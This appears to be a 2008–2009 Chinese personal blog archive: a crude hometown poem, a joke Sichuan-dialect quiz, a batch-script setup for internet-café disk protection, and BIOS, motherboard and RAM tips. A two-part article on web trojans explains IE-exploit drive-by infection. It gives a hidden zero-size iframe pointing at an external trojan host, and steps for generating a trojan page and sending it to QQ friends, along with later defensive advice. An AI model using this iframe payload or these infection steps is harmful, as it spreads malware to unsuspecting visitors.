强々少

江油儿女本色

9422319@qq.com(*强々少*) — Thu, 04 Jun 2009 04:39:03 GMT

窦团山上砍过树，ぁ猿王洞里盗过墓，此生行尽天涯路，ぁ江油儿女ァ就是酷。
◇花园街上赶过场，明华饭店嫖过倡，ぁ万里长城万里长，江油儿女ァ就是强。
◇金轮干道下过海，北门车站挂过彩，青山颜色终不改，ぁ江油儿女ァ就是拽。
◇涪江河头洗过澡，ぁ太白公园赛过跑，天若有情天亦老，江油儿女ァ就是叼。
◇二号桥头打过劫，一中门口飙过血，ぁ意气精魄坚如铁，江油儿女ァ就是烈。
◇三合小学练过武，ぁ城皇庙里嗨过舞，天下英雄皆入土，江油儿女ァ就是虎。
◇马记床上流过汗，江油宾馆吃过饭，也曾弯弓射大雁，ぁ江油儿女ァ就是赞。
◇派出所里睡过觉，ぁ公安局里报过到，曾与将军驱虎豹，江油儿女ァ就是毛。
◇快乐老家摆过淫，公园坝里发过情，ぁ气划长空万里云，江油儿女ァ就是行。
◇地主桌上翻过本，粮贸大厦吸过粉，千秋家国血未冷ぁ，江油儿女ァ就是狠

网吧防病毒母盘,终级解决方案

9422319@qq.com(*强々少*) — Sun, 18 Jan 2009 03:37:46 GMT

用讯闪+防删除软件+开机自动删除游戏盘下的多余目录和文件的排除删除软件+虚拟磁盘
如下：
安装服务器系统
使用锐启CGO或网众虚拟磁盘时建议安装WIN2003，安装也可使用WIN2000SEVER
使用CCDISK时建议安装WIN2000SEVER
向服务器上复制游戏与相应软件
使用锐启CGO则在服务器上，配置客户机的虚拟磁盘为H盘
安装客户机系统，建议XP，分区为C区系统，D区网络游戏，E区硬盘游戏
如果硬盘过小建议就分为C区系统D游戏
安装客户机游戏与相应软件加入相应注册表
安装虚拟磁盘客户端，使用其它虚拟磁盘时在客户机上设置虚拟磁盘为H盘
在服务器上建立一个只读共享目录 A
安装窗口强关器到 D:\强关器，进行配置（主要是防格式化与删除等操作）完成后复制D:\强关器目录到服务器只读共享目录, 设置D:\强关器为隐藏
安装讯闪客户端到D:\游戏菜单，并进行配置，完成后复制D:\游戏菜单到服务器只读共享目录，设置D:\游戏菜单为隐藏
安装排除删除程序到D:\排除删除，并进行配置(并改D:\排除删除下的DEL.EXE 为PCDEL.EXE)，完成后复制D:\排除删除目录到服务器只读共享目录，设置D:\排除删除为隐藏
在服务器只读共享目录 A中编写批处理文件 root.bat (假设服务器名为server)：
@echo off
md d:\强关器
xcopy \\server\a\强关器\*.* d:\强关器 /y /e
d:\强关器\Project1.exe
md d:\游戏菜单
xcopy \\server\a\游戏菜单\*.* d:\游戏菜单 /y /e
md d:\排除删除
xcopy \\server\a\排除删除\*.* d:\排除删除 /y /e
d:\排除删除\pcdel.exe
在客户机启动项中建立启动运行.bat
@echo off
call \\server\a\root.bat
d:\强关器\Project1.exe
之所以这样写
1行，主要是方便以后要加入别启动的运行程序，只要在服务器上的批处理中加入即可
2行,主要是防止服务器停用时，客户机启动时也可以正常加载窗口强关器d:\强关器\Project1.exe
禁用任务管理器主要是防止通过任务管理器结束窗口强关器的进程
当然也可以不使用虚拟磁盘,而直接使用共享更新方式，之所以使用虚拟磁盘更新方式是因为当客户机在同步更新游戏时，而服务器又在更新游戏时可能出现部分游戏的文件被站用无法写入或删除的情况.
3使用窗口强关器作用主要是防格式化与删除，及可以防部分非法软件的运行。
最后
运行pgedit.msc禁用自动播放功能
禁用MS-DOS方式
隐藏D区
禁止任务管理器
安装收费管理程序，如万象网管等
加入防arp攻击软件运行的补丁
加入防威金病毒的补丁
ghost
安装冰点还原，保护系除游戏以外的分区
如果怕病毒是吧，那就再加一个开机自动删除游戏盘下的所有*.exe文件，运行时讯闪会同步删除的*.exe文件，不就OK了吗？其实讯闪同步时本就有防病毒功能（高一点的讯闪版本），之所以我没写进我的具体操作中是因为加了这个之后平时到没什么问题，但服务器一坏了问题就来了，本机游戏分区中的*.exe文件因为被删除无法运行游戏了
当然此方法也存在被删除游戏分区中游戏的可能，其实用VD也可以照样删除游戏分区中的文件
部分版本的VD甚至什么软件也不用，只需要一个批处理就可以删除保护分区中的文件

[转]进来看哈-“四川话等级考试”试题

9422319@qq.com(*强々少*) — Mon, 05 Jan 2009 01:40:07 GMT

一。选择题（70分）
1。 “ 包谷 ” 是指（D）
A 农民 B 小麦 C 蝗虫 D 玉米
2。 “ 批噻噻 ” 是形容一个人（A）
A 舌头长，搬弄是非 B 一种腌制品 C 长得强壮 D 一种交通工具
3。 “ 叮叮猫 ” 是指（B）
A 猫猫好可怜 B 蜻蜓 C 人长得瘦小 D 螳螂
4。 “ 泡梢 ” 是（C）
A 骂一个中年妇女体型象泡菜罐 B 指卖泡菜的少女 C 夸年轻女孩发育的好，长得水灵 D 一种泡菜名称
5。 “ 梭椰子 ” 是（D）
A 给买椰子的人取得绰号 B 骂一妇女体型象椰子 C 夸小伙子肌肉发达 D 骂一女人乱搞男女关系
6。 “ 秋瓣儿 ” 是（C）
A 说某人厉害 B 说某人是黑社会打手 C 骂某人土气、精神涣散 D 夸某女孩会持家
7。同音听力： “ 风丝麻木 ” 是形容某人（C）
A 小偷小摸 B 少男痴情 C 调皮捣蛋 D 少女怀春
8。“扯火伞”是（B）
A 下雨撑伞 B 打雷和闪电 C 用伞把火灭了 D 把伞撕破了
二。同音听力问答题（30分）（引号表示有同音字取代）
1。请翻译： “ 一身周武郑王的爪子嘛？少洋盘！少切那些卡卡，多走两个塔塔。 ” （10分）
答:你穿的那么周正干什么?少觉得自己很洋气!别老去不好的地方,多去外面好的地方走走.
2。请解释大意：（20分）
张**昨天上 “ 该 ”(街) ，看哆(到) “ 姑尼儿 ”(姑娘) 卖 “ 拌壳儿 ” (贝壳)， “ 姑尼儿 ” 吼一块一斤，就拿了三块给 “ 姑尼儿 ” 。又看哆有人卖 “ 孩子 ”(鞋) ， “ 上切 ” (上前)听哆： “ 跳楼啦，跳楼啦，五块啊."(跳楼价,指很便宜的价格) 看哆 “ 孩子 ” 还巴适(好)，就给了五块。 “ 挥切 ”(回去)“ 起哦 ” 哆小 “ 行行 ” 头上冒了个 “ 丰登儿 ”(风筝) 出来，想起 “ 顺耳 ” 喜欢，但是下哆 “ 行行 ” 又没 “ 起哦 ” 哆卖，只好 “ 挥切 ” 了。
张老头看哆 “ 拌壳儿 ” 冒火，说张**遭烧(骗)了，拿两块就差不多了，买的锤子啊！广耳屎撒？（听不进人话的人）张**也冒火：你还卖钩子(屁股)的咧！
2003年入川托福（四川话等级考试）试题
（答题时间：120分钟）
一、填空题：（20分，每题4分）
1、四川球迷享誉全国的口号是—— 雄起
2、四川男人说“我屋里头的”是指——我内人
4、“空了吹”是___ 说大话
5、“豁别个”是___ 骗人家
6、“切猫儿”是___ 癞蛤蟆
二：选择题：（20分，每题4分）
1、这娃瓜戳戳的，是说： 4
（1）是卖瓜的
（2）是帮买瓜顾客剖瓜的
（3）是在茶馆里扫瓜子皮的
（4）是个傻瓜
2、“切哪个塌塌？”意思是：3
（1）切蛋糕吗？
（2）修理塌塌米吗？
（3）去哪里？
（4）维修塌陷的地方
3、“昨晚黑那个荡荡”意思是：1
（1）昨天晚上去的地方
（2）昨天晚上很黑
（3）昨天晚上有个荡妇骚扰他
（4）昨天晚上他黑了别个的主页
4、“你虾子不胎害！”意思是：3
（1）夸奖他不害人
（2）养的虾子没有遗传毛病
（3）骂不知道好歹
（4）是一句没有实际意义的表达感情的话
5、“连二杆”是：3
（1）一种类似三接棒的冷兵器
（2）是机器的零件
（3）是人的小腿
（4）指一个人一口气抽两支烟
6 “抵陇倒拐”是: 4
(1)拐杖倒了
(2)一种拐杖的品牌
(3)走路的意思
(4)走到底，然后转弯
三、判断正误（20分，每题4分）
1、
请看下面这段话：
A对B说：“你娃不落教(讲信用)哈，喊你把这低低儿（儿连读）(一点点)喝了，你阴索索(悄悄)的倒到茅室荡荡头(茅厕坑)，还豁(骗)老子，扯谎撩白(撒谎,不说真话)的”。
B打着饱嗝说：“爪子嘛(干什么)？龟儿(龟儿子)还好意思霉(冤枉)老子(我)，你看你的心口子板(心坎)上，跟瓜娃儿(弱智孩子)流的憨口水样，一大坨(片)都是流汤刮水湿洼洼的，还好意思批我的教(职责我)。”
这段话的意思反映A与B又在喝酒（正确、错误）
2、
A对一个漂亮MM说：“你莫(别)瞎迷串眼(瞎了眼睛)的跟到B飘(耍)，那虾爬(坏东西)，穿得污猫儿（猫儿连读）灶狗日笼垮稀(形容穿的乱七八糟,很土气)的，到处假打(形容吹牛,觉得自己很行的样子)，结果下水里头莫得捞捞(形容没有实际本事,在他那里捞不到什么好东西)。二天(以后)你要是跟了我噻，我每天给你买个锅魁（一种馍），啃得你牙齿一斜一斜的，保险(准保)你安逸得脸笑得稀烂。真的巴适，哪个儿豁(骗)你。”
这是A在辱骂那个漂亮妹妹。（正确、错误）
3、“球打个耳屎你”("球"相当于中指的含义,打个屁呀你.形容你打球大的不好)是说一只球正好打在人的耳朵上，把耳屎打了出来。　（正确、错误）
4、"葩耳朵"(也可指被老婆管教的男人)是一种四川流行的自行车改装的交通工具。（正确、错误）
5、“吃嘎嘎，吃茫茫”(指吃肉,吃饭)不是真的吃东西，是形容一种好听的声音。（正确、错误）
四、简述题（20分，每题5分）
1、请简述“龟儿子”与“闺儿子”的的辨证关系
2、“解手”(上厕所)典故的由来
3、什么是“弹绷子”(用手指去弹额头)(本意以及引申意)

更改XP收藏夹的位置

9422319@qq.com(*强々少*) — Sun, 04 Jan 2009 06:10:02 GMT

用户的收藏的网址系统默认存放在C:\Documents and Settings\{username} \收藏夹里。但有时因为种种原因要重做系统时，应该把这个文件复制出来，在做完系统后把这个文件夹还原回到原位置即可使用以前的收藏网址。但有时可能也因为遗或不可抗拒的不能进去备份，那对于喜欢用收藏夹收藏网址的人可真是莫大的不幸。现在我给你个办法：更改收藏夹位置，无忧存取精品网址。
在任务栏上点击开始按钮，然后在开始菜单中点击运行，输入regedit并点击确定，打开注册表编辑器。展开HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders 修改里面的Favorites值，将%USERPROFILE%\Favorites的%USERPROFILE%改成你要更改的路径，如我的更改为G:\web\Favorites
关闭注册表编辑器，重新打开IE窗口看看，你的收藏夹已经更改到你的备份文件夹里了，再重做系统也不怕忘记备份收藏夹了。

常见主板小问题排除

9422319@qq.com(*强々少*) — Sat, 03 Jan 2009 01:41:47 GMT

一、CMOS参数丢失　　
　　开机后提示“CMOS Battery State Low”，有时可以启动，使用一段时间后死机，这种现象大多是CMOS供电不足引起的。对于不同的CMOS供电方式，采取不同的措施：1.焊接式电池：用电烙铁重新焊上一颗新电池即可。2.钮扣式电池：直接更换。3.芯片式：更换此芯片最好采用相同型号芯片替换。如果更换电池后时间不长又出现同样现象的话，很可能是主板漏电，可检查主板上的二极管或电容是否损坏，也可以跳线使用外接电池。　　
　　二、主板上键盘接口不能使用　　
　　接上一好键盘，开机自检时出现提示“Keyboard Interface Error”后死机，拔下键盘，重新插入后又能正常启动系统，使用一段时间后键盘无反应，这种现象主要是多次拔插键盘引起主板键盘接口松动，拆下主板用电烙铁重新焊接好即可；也可能是带电拔插键盘，引起主板上一个保险电阻断了（在主板上标记为Fn的东西），换上一个1欧姆/0.5瓦的电阻即可。　　
　　三、集成在主板上的显示适配器故障　　
　　一般来说，计算机开机响几声，大多数是主板内存没插好或显示适配器故障。有一长城微机，开机响8声，确定是显示器适配器故障。打开机箱发现显示适配器集成在主板上，又无主板说明书。针对这种情况，要仔细查看主板上的跳线标示，屏蔽掉主板上集成的显示设备，然后在扩展槽上插上好的显示卡后故障排除（有些主板可能是通过CMOS设置来允许或禁止该功能）。　　
　　四、集成在主板上的打印机并口损坏　　
　　品牌机及多数486以上的微机打印机并口，大多集成在主板上，用机的时候带电拔插打印机信号电缆线最容易引起主板上并口损坏。遇到类似情况，可以查看主板说明书，通过“禁止或允许主板上并口功能”相关跳线，设置“屏蔽”主板上并口功能。另一种是通过CMOS设置来屏蔽，然后在ISA扩展槽中加上一块多功能卡即可。　　
　　五、主板上软、硬盘控制器损坏　　
　　从486开始，大多数主板均集成软、硬盘控制器。如果软盘控制器损坏，也可以仿照上面的方法加一块多功能卡即可搞定（相应更改主板上跳线或CMOS设置）；如果硬盘控制器坏，针对不同情况处理：如果所接硬盘小于528MB，可以加多功能卡；如果不是的话，需要更新主板BIOS或利用相关的软件了。　　
　　六、主板上Cache损坏　　
　　主板上Cache损坏，表现为运行软件死机或根本无法装软件。可以在CMOS设置中将“External Cache”项设为“Disable”后故障排除。　　
　　七、主板上开关电源损坏　　
　　主板上的电源多为开关电源，所用的功率管为分离器件，如有损坏，只要更换功率管、电容等即可。

如何判别主板BIOS启动时报警声音的含义？

9422319@qq.com(*强々少*) — Sat, 03 Jan 2009 01:30:18 GMT

　BIOS的英文全称为(Basic Input Output System)，汉语的意思即基本输入/输出系统，无论是从早期的386，还是到现在PIII，P4系统，所使用主板中的BIOS，都应该算得上是电脑中最基础而又最重要的程序了。
　　电脑开机后，BIOS最先被启动，然后它会对电脑的硬件设备进行完全彻底的检验和测试。如果出现问题，分两种情况处理：严重时故障停机，不给出任何提示或信号；非严重故障则给出屏幕提示或声音报警信号，等待用户处理。如果未发现问题，则将硬件设置为备用状态，最后启动操作系统，把对电脑的控制权交给用户。
　　目前市场上常见BIOS主要有两种（AMI BIOS和Award BIOS），型号可从BIOS芯片上或者从开机自检的信息中看到，看到AMI的字样的就是AMI BIOS；反之看到Award字样则为Award BIOS。
　　下面我们可以来看看常见的一些声音报警信号所指的具体含义：
　　Award BIOS
　

　　　
　
　
　　1短：系统正常启动。可以说明机器没有问题。
　　1长1短：内存或主板报错。换内存试试，如果还是不行，只好更换主板。
　　1长2短：显示器或显示卡错误。
　　1长3短：键盘控制器错误，检查主板。
　　不断地响（长声）：内存条未插紧或损坏。重插内存条，若还是不行，只有更换一条内存。
　　无声音无显示：电源有问题。
　　AMI BIOS
　　1短：内存刷新失败。更换内存条。
　　2短：内存ECC较验错误。在CMOS Setup中将内存关于ECC校验的选项设为Disabled就可以解决，不过最根本的解决办法还是更换一条内存。
　　3短：系统基本内存（第1个64kB）检查失败。换内存。
　　4短：系统时钟出错。
　　5短：中央处理器（CPU）错误。
　　6短：键盘控制器错误。
　　7短：系统实模式错误，不能切换到保护模式。
　　8短：显示内存错误。显示内存有问题，更换显卡试试。
　　9短：ROM BIOS检验和错误。
　　1长3短：内存错误。内存损坏，更换即可。
　　1长8短：显示测试错误。显示器数据线没插好或显示卡没插牢。

AWARD BIOS 设置详解

9422319@qq.com(*强々少*) — Tue, 30 Dec 2008 09:40:38 GMT

AWARD BIOS是目前应用最为广泛的一种BIOS。本文将详细介绍一下AWARD BIOS中的有关设置选项的含义和设置方法，在AWARD BIOS的主菜单中主要有以下几个菜单项：
　　Standard CMOS Setup（标准CMOS设定）：这个选项可以设置系统日期、时间、IDE设备、软驱A与B、显示系统的类型、错误处理方法等。
　　（1）在IDE设备设置中，用户可以在Type（类型）和Mode（模式）项设为Auto，使每次启动系统时BIOS自动检测硬盘。也可以在主菜单中的IDE HDD Auto Detection操作来设置。用户还可以使用User选项，手动设定硬盘的参数。必须输入柱面数（Cyls），磁头数（Heads），写预补偿（Precomp），磁头着陆区（Landz），每柱面扇区数（Sectorxs），工作模式（Mode）等几种参数。硬盘大小在上述参数设定后自动产生。
　　（2）显示类型可选EGA/VGA（EGA、VGA、SEGA、SVGA、PGA显示适配卡选用）、CGA40（CGA显示卡，40列方式）、CGA80（CGA显示卡，80列方式）、MONO（单色显示方式，包括高分辨率单显卡）等四种，以现在我们使用的计算机来看，绝大多数都属于EGA/VGA显示类型。
　　（3）暂停的出错状态选项有：All Errors（BIOS检测到任何错误，系统启动均暂停并且给出出错提示）、No Errors（BIOS检测到任何错误都不使系统启动暂停）、All But Keyboard（BIOS检测到除了磁盘之外的错误后使系统启动暂停，磁盘错误暂停）、All But Disk/Key（BIOS检测到除了键盘或磁盘之外的错误后使系统启动暂停。
　　BIOS Features Setup（BIOS功能设定）
　　该项用来设置系统配置选项清单，其中有些选项由主板本身设计确定，有些选项用户可以进行修改设定，以改善系统的性能。常见选项说明如下：
　　（1）Virus Warning（病毒警告）：这项功能在外部数据写入硬盘引导区或分配表的时候，会提出警告。为了避免系统冲突，一般将此功能关闭，置为Disable（关闭）。
　　（2）CPU Internal Cache（CPU Level 1 catch）：缺省为Enable（开启），它允许系统使用CPU内部的第一级Cache。486以上档次的CPU内部一般都带有Cache，除非当该项设为开启时系统工作不正常，此项一般不要轻易改动。该项若置为Disable，将会严重影响系统的性能。
　　（3）External Cache（CPU Level 1 catch）：缺省设为Enable，它用来控制主板上的第二级（L2）Cache。根据主板上是否带有Cache，选择该项的设置。
　　（4）BIOS Update：开启此功能则允许BIOS升级，如关闭则无法写入BIOS。
　　（5）Quick Power On Self Test：缺省设置为Enable，该项主要功能为加速系统上电自测过程，它将跳过一些自测试。使引导过程加快。
　　（6）Hard Disk Boot From（HDD Sequence SCSI/IDE First）:选择由主盘、从盘或SCSI硬盘启动。
　　（7）Boot Sequence：选择机器开电时的启动顺序。有些BIOS将SCSI硬盘也列在其中，此外比较新的主板还提供了LS 120和ZIP等设备的启动支持，一般BIOS，都有以下四种启动顺序：C，A（系统将按硬盘，软驱顺序寻找启动盘）；A，C（系统将按软驱，硬盘顺序寻找启动盘）；CDROM，C，A（系统按CDROM，硬盘，软驱顺序寻找启动盘）；C，CDROM，A（系统按硬盘，CDROM，软驱顺序寻找启动盘）。
　　（8）Swap Floppy Drive:（交换软盘驱动器）缺省设定为Disable。当它Disable时，BIOS把软驱连线扭接端子所接的软盘驱动器当作第一驱动器。当它开启时，BIOS将把软驱连线对接端子所接的软盘驱动器当作第一驱动器，即在DOS下A盘当作B盘用，B盘当作A盘用。
　　（9）Boot Up Floppy Seek：当Enable时，机器启动时BIOS将对软驱进行寻道操作。
　　（10）Floppy Disk Access Contol：当该项选在R/W状态时，软驱可以读和写，其它状态只能读。
　

　　　
　
　
　　（11）Boot Up Numlock Strtus:该选项用来设置小键盘的缺省状态。当设置为ON时，系统启动后，小键盘的缺省为数字状态；设为OFF时，系统启动后，小键盘的状态为箭头状态。
　　（12）Boot Up System Speed：该选项用来确定系统启动时的速度为HIGH还是LOW。
　　（13）Typematic Rate Setting:该项可选Enable和Disable。当置为Enable时，如果按下键盘上的某个键不放，机器按你重复按下该键对待；当置为Disable时，如果按下键盘上的某个键不放，机器按键入该键一次对待。
　　（14）Typematic Rate:如果Typematic Rate Setting选项置为Enable，那么可以用此选项设定当你按下键盘上的某个键一秒钟，那么相当于按该键6次。该项可选6、8、10、12、15、20、24、30。
　　（15）Typematic Delay：如果Typematic Rate Setting选项置为Enable，那么可以用此选项设定按下某一个键时，延迟多长时间后开始视为重复键入该键。该项可选250、500、750、1000，单位为毫秒。
　　（16）Security Option:选择System时，每次开机启动时都会提示你输入密码，选择Setup时，仅在进入BIOS设置时会提示你输入密码。
　　（17）PS/2 Mouse Function Control：当该项设为Enable，机器提供对于PS/2类型鼠标的支持，AUTO可以在系统启动是自动侦测PS/2 Mouse，分配IRQ。
　　（18）Assign PCI IRQ For VGA:选Enable时，机器将自动设定PCI显示卡的IRQ到系统的DRAM中，以提高显示速度和改善系统的性能。
　　（19）PCI/VGA Palett Snoop：该项用来设置PCI/VGA卡能否与MPEG ISA/VESA VGA卡一起用。当PCI/VGA卡与MPEG ISA/VESA VGA卡一起用或使用其他非标准VGA时，该项应设为Enable。
　　（20）OS Select For DRAM>64MB：如果使用OS/2操作系统，使用64MB以上的内存。该项选为OS2。
　　（21）System BIOS Shadow:该选项的缺省设置默认为Enable，当它开启时，系统BIOS将拷贝到系统Dram中，以提高系统的运行速度和改善系统的性能。
　　（22）Video BIOS Shadow:缺省设定为开启（Enable），当它开启时，显示卡的BIOS将拷贝到系统DRAM中，以提高显示速度和改善系统的性能。
　　（23）C8000－CBFFF Shadow/DFFFF Shadow:这些内存区域用来作为其他扩充卡的ROM映射区，一般都设定为禁止（Disable）。如果有某一扩充卡ROM需要映射，则用户应搞清楚该ROM将映射地址和范围，可以将上述的几个内存区域都置为Enable;但这样将造成内存空间的浪费。因为映射区的地址空间将占用系统的640K～1024K之间的某一段内存。

网页木马从原理、制作到防范(2)

9422319@qq.com(*强々少*) — Mon, 29 Dec 2008 09:03:49 GMT

小提示：“src”的属性“http://go163go.vicp.net/hk.htm”是上传到服务器上的网页木马的网址。　　把这段代码插入到某门户网站首页源代码的…之间，从表面上看，插入后该门户的首页并没有什么变化，但是，所有访问了该门户网站首页的人都会中木马，为什么会这样呢？这是因为这段代码中标签把网页木马网页隐藏性地“包含”在了插入代码的网页当中。
　　也叫浮动帧标签，它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效果（如图5），被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。在上代代码中，因为把宽（width）、高（height）、边框（frameborder）都设置为了“0”，所以，上述代码插入到门户网站的首页后，网站的首页不会发生变化，但是，由于嵌入的网页实际上已经打开了，所以网页上的下载木马和运行木马的脚本还是会随着门户首页的打开而执行的。

图5 iframe标签示例

　　也许有人会问，如何把上述代码插入到门户网站首页的源代码中？这个问题问得好，本人才疏学浅，确实无法进入他们的服务器修改网页，但是黑客如果发现了这些服务器上的漏洞且获得了webshell权限，那么修改他们的网页就跟在本地制作一个网页一样容易。
　　有人还问，拿到服务器的webshell权限容易吗？如果你对网络安全比较关注，你会发现，经常有这个网站被黑了，那个网站的主页被修改了的新闻爆出。
　　有人还问，门户的服务器几乎无漏洞可找，个人服务器的漏洞较多，你能进入吗？本人不是黑客，中华人民共和国的法律规定，入侵和篡改他人服务器上的信息是违法行为，希望大家共同维护网络安全。
　　以前，在网上打开一些有名的网站时杀毒软件也会报警，现在你明白其中的道理了吧。有些人在这些网站发帖子骂娘，看了本文
三：网页木马的防范策略
　　网页木马的防范只靠杀毒软件和防火墙是远远不够的，因为一旦黑客使用了反弹端口的个人版木马（个人反汇编的一些杀毒软件无法识别的木马），那么杀毒软件和防火墙就无可奈何，所以，网页木马的防范要从它的原理入手，从根子上进行防范。
　　㈠即时安装安全补丁
　　网页木马都是利用IE漏洞进行传播的，我们拿冰狐浪子的网页木马（用“冰狐浪子网页木马生成器”制作的网页木马）来说吧，该网页能绕过IE的安全设置，当用户连接到该网页时，它能在普通用户不知情的情况下在后台下载一个木马并运行（安装）该木马。所以，经常到微软网站去下载并安装最新的安全补丁是防范网页木马比较有效的办法。
　　㈡改名或卸载（反注册）最不安全的ActiveXObject（IE插件）
　　在系统中有些ActiveXObject会运行EXE程序，比如本文中“自动运行程序”代码中的Shell.application控件，这些控件一旦在网页中获得了执行权限，那么它就会变为木马运行的“温床”，所以把这些控件改名或卸载能彻底防范利用这些控件的网页木马。但是ActiveXObject是为了应用而出现的，而不是为了攻击而出现的，所有的控件都有它的用处，所以在改名或卸载一个控件之前，你必须确认这个控件是你不需要的，或者即使卸载了也不关大体的。
　　⒈卸载（反注册）ActiveXObject
　　第一步：在“开始”菜单上单击“运行”，输入“CMD”命令打开命令提示符窗口。
　　第二步：在命令提示符下输入“regsvr32.exe shell32.dll /u/s”，然后回车就能将Shell.application控件卸载。
　　如果日后我们希望继续使用这个控件的话，可以在命令提示符窗口中输入“regsvr32.exe shell32.dll /i/s”命令将它们重新安装（注册）。在上述命令中：“regsvr32.exe”是注册或反注册OLE对象或控件的命令，是反注册参数，[/s]是寂静模式参数，为安装参数。
　　⒉改名ActiveXObject
　　需要说明的是，改名一个控件时，控件的名称和CLSID（Class ID）都要改，并且要改彻底了。下面仍以Shell.application为例来介绍方法。
　　第一步：打开注册表编辑器，查找“Shell.application”。用这个方法能找到两个注册表项：“{13709620-C279-11CE-A49E-444553540000}”和“Shell.application”。
　　第二步：把{13709620-C279-11CE-A49E-444553540000}改为{13709620-C279-11CE-A49E-444553540001}，注意，不要和系统中的其它CLSID重复。
　　第三步：把“Shell.application”改名为“Shell.application_xxx”。以后用到这个控件的时候你使用这个名称就可以正常调用此控件了。，希望在骂娘时你也能为那些垫背的站长想想.
㈢提高IE的安全级别，禁用脚本和ActiveX控件
　　经笔者的测试，用冰狐浪子的“网页木马专业版生成器”生成的网页木马，只要调高IE的安全级别，或者禁用脚本，该网页木马就不起作用了。从木马的攻击原理我们可以看出，网页木马是利用IE脚本和ActiveX控件上的一些漏洞下载和运行木马的，只要我们禁用了脚本和ActiveX控件，就可以防止木马的下载和运行。
　　小提示：禁用脚本和ActiveX控件会使一些网页的功能和效果失去作用，所以是否禁用，你要根据自己对安全的需要来定。
　　第一步：在IE浏览器的菜单栏上选择“工具→Internet选项”打开“Internet选项”对话框。
　　第二步：在“安全”选项卡上，在Internet和本地Internet区域，分别把滑块移动到最高（如图6），或者点击“自定义级别”，在打开的对话框上禁用脚本，禁用ActiveX控件。

网页木马从原理、制作到防范(1)

9422319@qq.com(*强々少*) — Mon, 29 Dec 2008 09:01:50 GMT

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页，经检查，我确实中了灰鸽子。怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。　　以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理
　　首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。
　　有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
　⒈自动下载程序
　　
　　把这段代码插入到网页源代码的…之间，然后用IE打开该网页，你会发现，这段代码可以在没有打相关补丁的IE6中自动打开记事本。
　　这段代码使用了shell.application控件，该控件能使网页获得执行权限，替换代码中的“Notepad.exe”（记事本）程序，可以用它自动运行本地电脑上的任意程序。
　　通过以上的代码我们可以看出，利用IE的漏洞，也就是说在网页中插入适当的代码，IE完全可以自动下载和运行程序，不过，IE一旦打了相关补丁，这些代码就会失去作用。另外，这些代码要运行和下载程序，有些杀毒软件的网页监控会视它们为病毒，为了逃避追杀，黑客可能会使用一些工具对网页的源代码进行加密处理（如图3）。

图3 加密后的网页代码

二、网页木马的基本用法
　　理解了网页木马攻击的原理，我们可以制作自己的网页木马，但这需要你根据IE漏洞写出利用代码。实际上，在网上有很多高手已写出了一些漏洞的利用代码，有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索，你会发现，在网上有很多利用IE的各种漏洞编写的网页木马生成器，它们大都为可视化的程序，只要你有一个木马（该木马必须把它放置到网络上），利用这些生成器你就可以立即生成一个网页，该网页就是网页木马，只要他人打开这个网页，该网页就可以自动完成下载木马并运行（安装）木马的过程。
　　在我的电脑上我已下载了一个网页木马生成器，下面我们来看怎么生成网页木马并让他人中木马。
　　第一步：启动该网页木马生成器，如图4所示，在文本框中输入木马的网络地址，最后单击“生成”。

图4 网页木马生成器

　　第二步：在网页木马生成器的安装文件夹会生成一个网页文件，该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。
　　现在好了，把上述网页在服务器上的地址（网址）通过QQ发给自己的好友，一旦他访问了该网页，该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。
　　现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧！实际上，即使人人都不打开陌生人发来的网址，也仍然有一些人“飞蛾补灯，自寻死路”，因为若大的Internet，总会有一些人会有意或无意地访问这些网址，而且，有些网页木马，还挂在一些知名网站上（根据知名网站的访问量，你算算吧，每天有多少人中了木马！）。
　　小提示：你可能还没想到，看电影，在论坛查看或回复帖子也能中木马。实际上，网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上，这样，用户一旦观看电影、查看或预览邮件（主要是一些用电子邮件群发器发送的垃圾邮件）、参与帖子，打开电子书，用户就会中网页木马。
　　在下面我们只介绍黑客如何在知名网站上挂网页木马。下面来看这一段代码：iframe src="http://go163go.vicp.net/hk.htm" width="0" height="0" frameborder="0">

各品牌内存编码含义

9422319@qq.com(*强々少*) — Mon, 29 Dec 2008 06:16:15 GMT

Samsung

　　具体含义解释：

　　例：SAMSUNG K4H280838B-TCB0

　　主要含义：

　　第1位——芯片功能K，代表是内存芯片。

　　第2位——芯片类型4，代表DRAM。

　　第3位——芯片的更进一步的类型说明，S代表SDRAM、H代表DDR、G代表SGRAM。

　　第4、5位——容量和刷新速率，容量相同的内存采用不同的刷新速率，也会使用不同的编号。64、62、63、65、66、67、6A代表64Mbit的容量；28、27、2A代表128Mbit的容量；56、55、57、5A代表256Mbit的容量；51代表512Mbit的容量。

　　第6、7位——数据线引脚个数，08代表8位数据；16代表16位数据；32代表32位数据；64代表64位数据。

　　第11位——连线“-”。

　　第14、15位——芯片的速率，如60为6ns；70为 7ns；7B为7.5ns (CL=3)；7C为7.5ns (CL=2) ；80为 8ns；10 为10ns (66MHz)。

